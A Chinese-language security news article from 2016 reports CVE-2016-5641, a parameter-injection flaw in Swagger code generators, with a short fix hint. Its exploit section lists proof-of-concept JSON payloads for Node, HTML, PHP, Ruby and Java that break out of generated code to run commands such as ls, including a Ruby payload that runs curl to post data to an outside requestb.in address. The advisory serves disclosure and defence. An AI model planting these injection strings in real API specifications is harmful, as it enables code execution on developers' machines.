频道栏目
首页 > 安全 > 系统安全 > 正文

Swagger曝远程代码执行漏洞,影响Java、PHP、NodeJS等众多开发语言

2016-06-29 09:11:08           
收藏   我要投稿

漏洞简述
Swagger规格被广泛的使用在Html、PHPJava和 Ruby等流行语言开发的应用中,其最近被曝出远程代码执行漏洞,潜在影响到了Java、PHP、NodeJS和 Ruby等流行语言开发的应用。这个漏洞的CVE编号为CVE-2016-5641。该漏洞属于参数注入漏洞,能够在Swagger JSON文件中嵌入恶意代码。如凡是使用Swagger API的应用程序都会受到影响。Rapid7社区的安全研究人员目前公开了该漏洞的技术细节和修补方案。

EXP
javascript (node)
“paths”: {         
     ”/a’);};};return exports;}));console.log(‘RCE’);(function(){}(this,function(){a=function(){b=function(){new Array(‘”: { 
html
“info”: { “description”: “alert(1)”,
php
“definitions”: {         
     ”d”: {             
          “type”: “object”,             
          “description”: “*/ echo system(chr(0x6c).chr(0×73)); /*”, 
ruby
“info”: {         
     ”description”: “=begin”, 
     ”title”: “=end `curl -X POST -d \”fizz=buzz\” http://requestb.in/1ftnzfy1`” 
Java
“paths”: {         
     ”/a\”; try{java.lang.Runtime.getRuntime().exec(\”ls\”);}catch(Exception e){} \”":  
修复简述
仔细检查Swagger特定语言的转义字符,比如对{}符号谨慎使用。详情请参考该链接

相关TAG标签 漏洞 语言 代码
上一篇:kali2.0下入侵windows 10和android手机实战
下一篇:linux内核递归漏洞——翻译自P0文章
相关文章
图文推荐
热门新闻

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站